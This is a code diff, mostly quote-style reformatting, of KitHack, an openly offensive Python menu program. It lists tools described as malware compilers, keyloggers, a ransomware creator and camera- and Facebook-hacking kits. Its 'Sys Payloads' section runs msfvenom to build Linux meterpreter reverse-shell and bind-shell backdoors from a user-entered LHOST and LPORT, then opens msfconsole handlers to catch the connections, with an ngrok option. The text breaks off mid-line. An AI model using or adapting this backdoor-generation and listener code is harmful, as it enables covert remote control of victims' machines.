kitools.UserScan() - elif tool == '19': + elif tool == "19": kitools.XCTRHackingTools() - elif tool == '20': + elif tool == "20": kitools.DeadTrap() else: print("\n{}[X] INVALID OPTION".format(RED)) time.sleep(1.5) - os.system('clear') + os.system("clear") main() - elif option == '09': - os.system('clear') - print('======{0}Tool{1}===================================================={0}Information{1}======================================='.format( - GREEN, DEFAULT)) - print('{0}01){1} TheFatRat {2}Malware Compiling Tool For Linux/Windows/MacOS & Android.'.format(WHITE, YELLOW, DEFAULT)) - print('{0}02){1} Msfpc {2}Payload Generation Tool.'.format( - WHITE, YELLOW, DEFAULT)) - print('{0}03){1} Fcrackzip {2}Archive Password Cracking Tool.'.format( - WHITE, YELLOW, DEFAULT)) - print('{0}04){1} QRLjacker {2}QR Code Session Hijacking Tool.'.format( - WHITE, YELLOW, DEFAULT)) - print('{0}05){1} Lazy {2}Script that automates many penetration processes.'.format( - WHITE, YELLOW, DEFAULT)) - print('{0}06){1} HTBINVITE {2}HTB Invite Generator.'.format( - WHITE, YELLOW, DEFAULT)) - print('{0}07){1} Ngrok {2}Local Reverse Proxy.'.format( - WHITE, YELLOW, DEFAULT)) - print('{0}08){1} Bluepot {2}Bluetooth Honeypot Written in Java.'.format( - WHITE, YELLOW, DEFAULT)) - print('{0}09){1} Setoolkit {2}Open Source Social Engineering Toolkit.'.format( - WHITE, YELLOW, DEFAULT)) - print('{0}10){1} A2sv {2}SSL Vulnerability Scanner.'.format( - WHITE, YELLOW, DEFAULT)) - print('{0}11){1} 4nonimizer {2}IP Anonymizer Using VPN Services.'.format( - WHITE, YELLOW, DEFAULT)) - print('{0}12){1} Easysploit {2}Metasploit Automation Toolkit.'.format( - WHITE, YELLOW, DEFAULT)) - print('{0}13){1} NXcrypt {2}Malware Injection Toolkit For Python Files.'.format( - WHITE, YELLOW, DEFAULT)) - print('{0}14){1} KnockMail {2}Email Validity Checker'.format( - WHITE, YELLOW, DEFAULT)) - print('{0}15){1} RkHunter {2}UNIX Rootkit/Backdoor/Local Exploit Detection Tool.'.format(WHITE, YELLOW, DEFAULT)) - print('{0}16){1} HeraKeylogger {2}Chrome Keylogger Extension.'.format( - WHITE, YELLOW, DEFAULT)) - print('{0}17){1} ZLogger {2}Persistent Remote Keylogger for Windows and Linux.'.format( - WHITE, YELLOW, DEFAULT)) - print('{0}18){1} Xerosploit {2}Penetration Testing Toolkit.'.format( - WHITE, YELLOW, DEFAULT)) - print('{0}19){1} Slacksec {2}Basic Hacking Toolkit.'.format( - WHITE, YELLOW, DEFAULT)) - print('{0}20){1} Katana-Framework {2}Penetration Testing Framework.'.format( - WHITE, YELLOW, DEFAULT)) - print('{0}21){1} Z0172CK-Tools {2}Z0172CK Hacking Toolkit.'.format( - WHITE, YELLOW, DEFAULT)) - print('{0}22){1} Cam-Hack {2}Advanced Mobile/PC Camera Hacking Tool Using a Link.'.format(WHITE, YELLOW, DEFAULT)) - print('{0}23){1} Onex {2}Hacking Tool Library.'.format( - WHITE, YELLOW, DEFAULT)) - print('{0}24){1} Ransom0 {2}Ransomware Creation Tool.'.format( - WHITE, YELLOW, DEFAULT)) - print('{0}25){1} Morpheus {2}TCP/UDP Man-in-the-Middle Attack Suite.'.format(WHITE, YELLOW, DEFAULT)) - print('{0}26){1} FBTOOL {2}Facebook Hacking Toolkit'.format( - WHITE, YELLOW, DEFAULT)) - print('{0}27){1} Venom {2}Metasploit Shellcode Generator/Compiler/Driver.'.format(WHITE, YELLOW, DEFAULT)) - print('{0} 0){1} Back'.format(WHITE, YELLOW)) + elif option == "09": + os.system("clear") + print( + "======{0}Tool{1}===================================================={0}Information{1}=======================================".format( + GREEN, DEFAULT + ) + ) + print( + "{0}01){1} TheFatRat {2}Malware Compiling Tool For Linux/Windows/MacOS & Android.".format( + WHITE, YELLOW, DEFAULT + ) + ) + print( + "{0}02){1} Msfpc {2}Payload Generation Tool.".format( + WHITE, YELLOW, DEFAULT + ) + ) + print( + "{0}03){1} Fcrackzip {2}Archive Password Cracking Tool.".format( + WHITE, YELLOW, DEFAULT + ) + ) + print( + "{0}04){1} QRLjacker {2}QR Code Session Hijacking Tool.".format( + WHITE, YELLOW, DEFAULT + ) + ) + print( + "{0}05){1} Lazy {2}Script that automates many penetration processes.".format( + WHITE, YELLOW, DEFAULT + ) + ) + print( + "{0}06){1} HTBINVITE {2}HTB Invite Generator.".format( + WHITE, YELLOW, DEFAULT + ) + ) + print( + "{0}07){1} Ngrok {2}Local Reverse Proxy.".format( + WHITE, YELLOW, DEFAULT + ) + ) + print( + "{0}08){1} Bluepot {2}Bluetooth Honeypot Written in Java.".format( + WHITE, YELLOW, DEFAULT + ) + ) + print( + "{0}09){1} Setoolkit {2}Open Source Social Engineering Toolkit.".format( + WHITE, YELLOW, DEFAULT + ) + ) + print( + "{0}10){1} A2sv {2}SSL Vulnerability Scanner.".format( + WHITE, YELLOW, DEFAULT + ) + ) + print( + "{0}11){1} 4nonimizer {2}IP Anonymizer Using VPN Services.".format( + WHITE, YELLOW, DEFAULT + ) + ) + print( + "{0}12){1} Easysploit {2}Metasploit Automation Toolkit.".format( + WHITE, YELLOW, DEFAULT + ) + ) + print( + "{0}13){1} NXcrypt {2}Malware Injection Toolkit For Python Files.".format( + WHITE, YELLOW, DEFAULT + ) + ) + print( + "{0}14){1} KnockMail {2}Email Validity Checker".format( + WHITE, YELLOW, DEFAULT + ) + ) + print( + "{0}15){1} RkHunter {2}UNIX Rootkit/Backdoor/Local Exploit Detection Tool.".format( + WHITE, YELLOW, DEFAULT + ) + ) + print( + "{0}16){1} HeraKeylogger {2}Chrome Keylogger Extension.".format( + WHITE, YELLOW, DEFAULT + ) + ) + print( + "{0}17){1} ZLogger {2}Persistent Remote Keylogger for Windows and Linux.".format( + WHITE, YELLOW, DEFAULT + ) + ) + print( + "{0}18){1} Xerosploit {2}Penetration Testing Toolkit.".format( + WHITE, YELLOW, DEFAULT + ) + ) + print( + "{0}19){1} Slacksec {2}Basic Hacking Toolkit.".format( + WHITE, YELLOW, DEFAULT + ) + ) + print( + "{0}20){1} Katana-Framework {2}Penetration Testing Framework.".format( + WHITE, YELLOW, DEFAULT + ) + ) + print( + "{0}21){1} Z0172CK-Tools {2}Z0172CK Hacking Toolkit.".format( + WHITE, YELLOW, DEFAULT + ) + ) + print( + "{0}22){1} Cam-Hack {2}Advanced Mobile/PC Camera Hacking Tool Using a Link.".format( + WHITE, YELLOW, DEFAULT + ) + ) + print( + "{0}23){1} Onex {2}Hacking Tool Library.".format( + WHITE, YELLOW, DEFAULT + ) + ) + print( + "{0}24){1} Ransom0 {2}Ransomware Creation Tool.".format( + WHITE, YELLOW, DEFAULT + ) + ) + print( + "{0}25){1} Morpheus {2}TCP/UDP Man-in-the-Middle Attack Suite.".format( + WHITE, YELLOW, DEFAULT + ) + ) + print( + "{0}26){1} FBTOOL {2}Facebook Hacking Toolkit".format( + WHITE, YELLOW, DEFAULT + ) + ) + print( + "{0}27){1} Venom {2}Metasploit Shellcode Generator/Compiler/Driver.".format( + WHITE, YELLOW, DEFAULT + ) + ) + print("{0} 0){1} Back".format(WHITE, YELLOW)) tool = input("{0}KitHack >> {1}".format(RED, DEFAULT)) tool = tool.zfill(2) - if tool == '00': - os.system('clear') + if tool == "00": + os.system("clear") main() - elif tool == '01': + elif tool == "01": kitools.TheFatRat() - elif tool == '02': + elif tool == "02": kitools.Msfpc() - elif tool == '03': + elif tool == "03": kitools.Fcrackzip() - elif tool == '04': + elif tool == "04": kitools.QRLjacker() - elif tool == '05': + elif tool == "05": kitools.Lazy() - elif tool == '06': + elif tool == "06": kitools.HTBINVITE() - elif tool == '07': + elif tool == "07": kitools.Ngrok() - elif tool == '08': + elif tool == "08": kitools.Bluepot() - elif tool == '09': + elif tool == "09": kitools.Setoolkit() - elif tool == '10': + elif tool == "10": kitools.A2sv() - elif tool == '11': + elif tool == "11": kitools.Fornonimizer() - elif tool == '12': + elif tool == "12": kitools.Easysploit() - elif tool == '13': + elif tool == "13": kitools.NXcrypt() - elif tool == '14': + elif tool == "14": kitools.KnockMail() - elif tool == '15': + elif tool == "15": kitools.RkHunter() - elif tool == '16': + elif tool == "16": kitools.HeraKeylogger() - elif tool == '17': + elif tool == "17": kitools.ZLogger() - elif tool == '18': + elif tool == "18": kitools.Xerosploit() - elif tool == '19': + elif tool == "19": kitools.Slacksec() - elif tool == '20': + elif tool == "20": kitools.Katana() - elif tool == '21': + elif tool == "21": kitools.Z0172CKTools() - elif tool == '22': + elif tool == "22": kitools.CamHack() - elif tool == '23': + elif tool == "23": kitools.Onex() - elif tool == '24': + elif tool == "24": kitools.Ransom0() - elif tool == '25': + elif tool == "25": kitools.Morpheus() - elif tool == '26': + elif tool == "26": kitools.FBTOOL() - elif tool == '27': + elif tool == "27": kitools.Venom() else: print("\n{}[X] INVALID OPTION".format(RED)) time.sleep(1.5) - os.system('clear') + os.system("clear") main() - elif option == '10': + elif option == "10": # sys msfvenom - os.system('clear') + os.system("clear") print(msf_banner) - print('\n{0} [*] {1}Sys Payloads:\n'.format(DEFAULT, GREEN)) - print('{0}[01] {1}LINUX {0}--> {2}Kithack.elf'.format(WHITE, YELLOW, RED)) - print('{0}[02] {1}WINDOWS {0}--> {2}Kithack.exe'.format(WHITE, YELLOW, RED)) - print('{0}[03] {1}ANDROID {0}--> {2}Kithack.apk'.format(WHITE, YELLOW, RED)) - print('{0}[04] {1}MAC OS {0}--> {2}Kithack.macho'.format(WHITE, YELLOW, RED)) - print('{0}[05] {1}PHP {0}--> {2}Kithack.php'.format(WHITE, YELLOW, RED)) - print('{0}[06] {1}PYTHON {0}--> {2}Kithack.py'.format(WHITE, YELLOW, RED)) - print('{0}[07] {1}BASH {0}--> {2}Kithack.sh'.format(WHITE, YELLOW, RED)) - print('{0}[08] {1}PERL {0}--> {2}Kithack.pl'.format(WHITE, YELLOW, RED)) - print('{0}[09] {1}RUN MSFCONSOLE {0}'.format(WHITE, YELLOW)) - print('{0} [0] {1}Back'.format(WHITE, YELLOW)) + print("\n{0} [*] {1}Sys Payloads:\n".format(DEFAULT, GREEN)) + print("{0}[01] {1}LINUX {0}--> {2}Kithack.elf".format(WHITE, YELLOW, RED)) + print("{0}[02] {1}WINDOWS {0}--> {2}Kithack.exe".format(WHITE, YELLOW, RED)) + print("{0}[03] {1}ANDROID {0}--> {2}Kithack.apk".format(WHITE, YELLOW, RED)) + print("{0}[04] {1}MAC OS {0}--> {2}Kithack.macho".format(WHITE, YELLOW, RED)) + print("{0}[05] {1}PHP {0}--> {2}Kithack.php".format(WHITE, YELLOW, RED)) + print("{0}[06] {1}PYTHON {0}--> {2}Kithack.py".format(WHITE, YELLOW, RED)) + print("{0}[07] {1}BASH {0}--> {2}Kithack.sh".format(WHITE, YELLOW, RED)) + print("{0}[08] {1}PERL {0}--> {2}Kithack.pl".format(WHITE, YELLOW, RED)) + print("{0}[09] {1}RUN MSFCONSOLE {0}".format(WHITE, YELLOW)) + print("{0} [0] {1}Back".format(WHITE, YELLOW)) sys = input("{0}KitHack >> {1}".format(RED, DEFAULT)) sys = sys.zfill(2) - if sys == '00': - os.system('clear') + if sys == "00": + os.system("clear") main() - elif sys == '01': - print('{0}\n[*] {1}Select Payload:\n'.format(DEFAULT, GREEN)) - print( - '{0}[01]{1} linux/x64/meterpreter_reverse_http'.format(WHITE, YELLOW)) - print( - '{0}[02]{1} linux/x64/meterpreter_reverse_https'.format(WHITE, YELLOW)) - print( - '{0}[03]{1} linux/x64/meterpreter_reverse_tcp'.format(WHITE, YELLOW)) + elif sys == "01": + print("{0}\n[*] {1}Select Payload:\n".format(DEFAULT, GREEN)) + print("{0}[01]{1} linux/x64/meterpreter_reverse_http".format(WHITE, YELLOW)) print( - '{0}[04]{1} linux/x64/meterpreter/reverse_tcp'.format(WHITE, YELLOW)) - print('{0}[05]{1} linux/x64/shell_bind_tcp'.format(WHITE, YELLOW)) - print('{0}[06]{1} linux/x64/shell_reverse_tcp'.format(WHITE, YELLOW)) + "{0}[02]{1} linux/x64/meterpreter_reverse_https".format(WHITE, YELLOW) + ) + print("{0}[03]{1} linux/x64/meterpreter_reverse_tcp".format(WHITE, YELLOW)) + print("{0}[04]{1} linux/x64/meterpreter/reverse_tcp".format(WHITE, YELLOW)) + print("{0}[05]{1} linux/x64/shell_bind_tcp".format(WHITE, YELLOW)) + print("{0}[06]{1} linux/x64/shell_reverse_tcp".format(WHITE, YELLOW)) + print("{0}[07]{1} linux/x86/meterpreter_reverse_http".format(WHITE, YELLOW)) print( - '{0}[07]{1} linux/x86/meterpreter_reverse_http'.format(WHITE, YELLOW)) - print( - '{0}[08]{1} linux/x86/meterpreter_reverse_https'.format(WHITE, YELLOW)) - print( - '{0}[09]{1} linux/x86/meterpreter_reverse_tcp'.format(WHITE, YELLOW)) - print( - '{0}[10]{1} linux/x86/meterpreter/reverse_tcp'.format(WHITE, YELLOW)) - print('{0}[11]{1} linux/x86/shell_bind_tcp'.format(WHITE, YELLOW)) - print('{0}[12]{1} linux/x86/shell_reverse_tcp'.format(WHITE, YELLOW)) + "{0}[08]{1} linux/x86/meterpreter_reverse_https".format(WHITE, YELLOW) + ) + print("{0}[09]{1} linux/x86/meterpreter_reverse_tcp".format(WHITE, YELLOW)) + print("{0}[10]{1} linux/x86/meterpreter/reverse_tcp".format(WHITE, YELLOW)) + print("{0}[11]{1} linux/x86/shell_bind_tcp".format(WHITE, YELLOW)) + print("{0}[12]{1} linux/x86/shell_reverse_tcp".format(WHITE, YELLOW)) pay = input("{0}KitHack >> {1}".format(RED, DEFAULT)) pay = pay.zfill(2) - if pay == '01': + if pay == "01": run_network() LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) - OUT = input( - "\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) + OUT = input("\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) mainout = os.path.splitext(OUT)[0] - print( - "\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) + print("\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) time.sleep(4) os.system( - 'systemctl start postgresql && msfvenom -p linux/x64/meterpreter_reverse_http LHOST={0} LPORT={1} -f elf > output/{2}.elf'.format(LHOST, LPORT, mainout)) + "systemctl start postgresql && msfvenom -p linux/x64/meterpreter_reverse_http LHOST={0} LPORT={1} -f elf > output/{2}.elf".format( + LHOST, LPORT, mainout + ) + ) location = os.getcwd() - if os.stat('output/{}.elf'.format(mainout)).st_size != 0: + if os.stat("output/{}.elf".format(mainout)).st_size != 0: print( - "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.elf".format(GREEN, DEFAULT, location, mainout)) - if input("\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('systemctl stop postgresql && clear') + "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.elf".format( + GREEN, DEFAULT, location, mainout + ) + ) + if ( + input( + "\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format( + GREEN, RED, DEFAULT + ) + ).upper() + != "Y" + ): + os.system("systemctl stop postgresql && clear") main() else: if not ".tcp.ngrok.io" in LHOST: os.system( - 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD linux/x64/meterpreter_reverse_http; exploit\'"'.format(LHOST, LPORT)) + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD linux/x64/meterpreter_reverse_http; exploit\'"'.format( + LHOST, LPORT + ) + ) pause("\n{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') + os.system("systemctl stop postgresql && clear") main() else: - os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD linux/x64/meterpreter_reverse_http; exploit\'"') + os.system( + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD linux/x64/meterpreter_reverse_http; exploit\'"' + ) pause("\n{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') + os.system("systemctl stop postgresql && clear") main() else: print( - "{}[X] AN ERROR HAS OCCURED WHILST GENERATING THE PAYLOAD\n".format(RED)) + "{}[X] AN ERROR HAS OCCURED WHILST GENERATING THE PAYLOAD\n".format( + RED + ) + ) time.sleep(3) pause("{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') + os.system("systemctl stop postgresql && clear") main() - elif pay == '02': + elif pay == "02": run_network() LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) - OUT = input( - "\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) + OUT = input("\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) mainout = os.path.splitext(OUT)[0] - print( - "\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) + print("\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) time.sleep(4) os.system( - 'systemctl start postgresql && msfvenom -p linux/x64/meterpreter_reverse_https LHOST={0} LPORT={1} -f elf > output/{2}.elf'.format(LHOST, LPORT, mainout)) + "systemctl start postgresql && msfvenom -p linux/x64/meterpreter_reverse_https LHOST={0} LPORT={1} -f elf > output/{2}.elf".format( + LHOST, LPORT, mainout + ) + ) location = os.getcwd() - if os.stat('output/{}.elf'.format(mainout)).st_size != 0: + if os.stat("output/{}.elf".format(mainout)).st_size != 0: print( - "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.elf".format(GREEN, DEFAULT, location, mainout)) - if input("\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('systemctl stop postgresql && clear') + "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.elf".format( + GREEN, DEFAULT, location, mainout + ) + ) + if ( + input( + "\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format( + GREEN, RED, DEFAULT + ) + ).upper() + != "Y" + ): + os.system("systemctl stop postgresql && clear") main() else: if not ".tcp.ngrok.io" in LHOST: os.system( - 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD linux/x64/meterpreter_reverse_https; exploit\'"'.format(LHOST, LPORT)) + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD linux/x64/meterpreter_reverse_https; exploit\'"'.format( + LHOST, LPORT + ) + ) pause("\n{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') + os.system("systemctl stop postgresql && clear") main() else: - os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD linux/x64/meterpreter_reverse_https; exploit\'"') + os.system( + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD linux/x64/meterpreter_reverse_https; exploit\'"' + ) pause("\n{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') + os.system("systemctl stop postgresql && clear") main() else: print( - "{}[X] An error has occured whilst generating the backdoor\n".format(RED)) + "{}[X] An error has occured whilst generating the backdoor\n".format( + RED + ) + ) time.sleep(3) pause("{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') + os.system("systemctl stop postgresql && clear") main() - elif pay == '03': + elif pay == "03": run_network() LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) - OUT = input( - "\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) + OUT = input("\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) mainout = os.path.splitext(OUT)[0] - print( - "\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) + print("\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) time.sleep(4) os.system( - 'systemctl start postgresql && msfvenom -p linux/x64/meterpreter_reverse_tcp LHOST={0} LPORT={1} -f elf > output/{2}.elf'.format(LHOST, LPORT, mainout)) + "systemctl start postgresql && msfvenom -p linux/x64/meterpreter_reverse_tcp LHOST={0} LPORT={1} -f elf > output/{2}.elf".format( + LHOST, LPORT, mainout + ) + ) location = os.getcwd() - if os.stat('output/{}.elf'.format(mainout)).st_size != 0: + if os.stat("output/{}.elf".format(mainout)).st_size != 0: print( - "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.elf".format(GREEN, DEFAULT, location, mainout)) - if input("\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('systemctl stop postgresql && clear') + "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.elf".format( + GREEN, DEFAULT, location, mainout + ) + ) + if ( + input( + "\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format( + GREEN, RED, DEFAULT + ) + ).upper() + != "Y" + ): + os.system("systemctl stop postgresql && clear") main() else: if not ".tcp.ngrok.io" in LHOST: os.system( - 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD linux/x64/meterpreter_reverse_tcp; exploit\'"'.format(LHOST, LPORT)) + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD linux/x64/meterpreter_reverse_tcp; exploit\'"'.format( + LHOST, LPORT + ) + ) pause("\n{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') + os.system("systemctl stop postgresql && clear") main() else: - os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD linux/x64/meterpreter_reverse_tcp; exploit\'"') + os.system( + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD linux/x64/meterpreter_reverse_tcp; exploit\'"' + ) pause("\n{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') + os.system("systemctl stop postgresql && clear") main() else: print( - "{}[X] An error has occured whilst generating the backdoor\n".format(RED)) + "{}[X] An error has occured whilst generating the backdoor\n".format( + RED + ) + ) time.sleep(3) pause("{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') + os.system("systemctl stop postgresql && clear") main() - elif pay == '04': + elif pay == "04": run_network() LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) - OUT = input( - "\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) + OUT = input("\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) mainout = os.path.splitext(OUT)[0] - print( - "\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) + print("\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) time.sleep(4) os.system( - 'systemctl start postgresql && msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST={0} LPORT={1} -f elf > output/{2}.elf'.format(LHOST, LPORT, mainout)) + "systemctl start postgresql && msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST={0} LPORT={1} -f elf > output/{2}.elf".format( + LHOST, LPORT, mainout + ) + ) location = os.getcwd() - if os.stat('output/{}.elf'.format(mainout)).st_size != 0: + if os.stat("output/{}.elf".format(mainout)).st_size != 0: print( - "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.elf".format(GREEN, DEFAULT, location, mainout)) - if input("\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('systemctl stop postgresql && clear') + "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.elf".format( + GREEN, DEFAULT, location, mainout + ) + ) + if ( + input( + "\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format( + GREEN, RED, DEFAULT + ) + ).upper() + != "Y" + ): + os.system("systemctl stop postgresql && clear") main() else: if not ".tcp.ngrok.io" in LHOST: os.system( - 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD linux/x64/meterpreter/reverse_tcp; exploit\'"'.format(LHOST, LPORT)) + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD linux/x64/meterpreter/reverse_tcp; exploit\'"'.format( + LHOST, LPORT + ) + ) pause("\n{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') + os.system("systemctl stop postgresql && clear") main() else: - os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD linux/x64/meterpreter/reverse_tcp; exploit\'"') + os.system( + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD linux/x64/meterpreter/reverse_tcp; exploit\'"' + ) pause("\n{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') + os.system("systemctl stop postgresql && clear") main() else: print( - "{}[X] An error has occured whilst generating the backdoor\n".format(RED)) + "{}[X] An error has occured whilst generating the backdoor\n".format( + RED + ) + ) time.sleep(3) pause("{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') + os.system("systemctl stop postgresql && clear") main() - elif pay == '05': + elif pay == "05": run_network() LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) - OUT = input( - "\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) + OUT = input("\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) mainout = os.path.splitext(OUT)[0] - print( - "\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) + print("\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) time.sleep(4) os.system( - 'systemctl start postgresql && msfvenom -p linux/x64/shell_bind_tcp LHOST={0} LPORT={1} -f elf > output/{2}.elf'.format(LHOST, LPORT, mainout)) + "systemctl start postgresql && msfvenom -p linux/x64/shell_bind_tcp LHOST={0} LPORT={1} -f elf > output/{2}.elf".format( + LHOST, LPORT, mainout + ) + ) location = os.getcwd() - if os.stat('output/{}.elf'.format(mainout)).st_size != 0: + if os.stat("output/{}.elf".format(mainout)).st_size != 0: print( - "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.elf".format(GREEN, DEFAULT, location, mainout)) - if input("\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('systemctl stop postgresql && clear') + "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.elf".format( + GREEN, DEFAULT, location, mainout + ) + ) + if ( + input( + "\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format( + GREEN, RED, DEFAULT + ) + ).upper() + != "Y" + ): + os.system("systemctl stop postgresql && clear") main() else: if not ".tcp.ngrok.io" in LHOST: os.system( - 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD linux/x64/shell_bind_tcp; exploit\'"'.format(LHOST, LPORT)) + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD linux/x64/shell_bind_tcp; exploit\'"'.format( + LHOST, LPORT + ) + ) pause("\n{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') + os.system("systemctl stop postgresql && clear") main() else: os.system( - 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD linux/x64/shell_bind_tcp; exploit\'"') + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD linux/x64/shell_bind_tcp; exploit\'"' + ) pause("\n{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') + os.system("systemctl 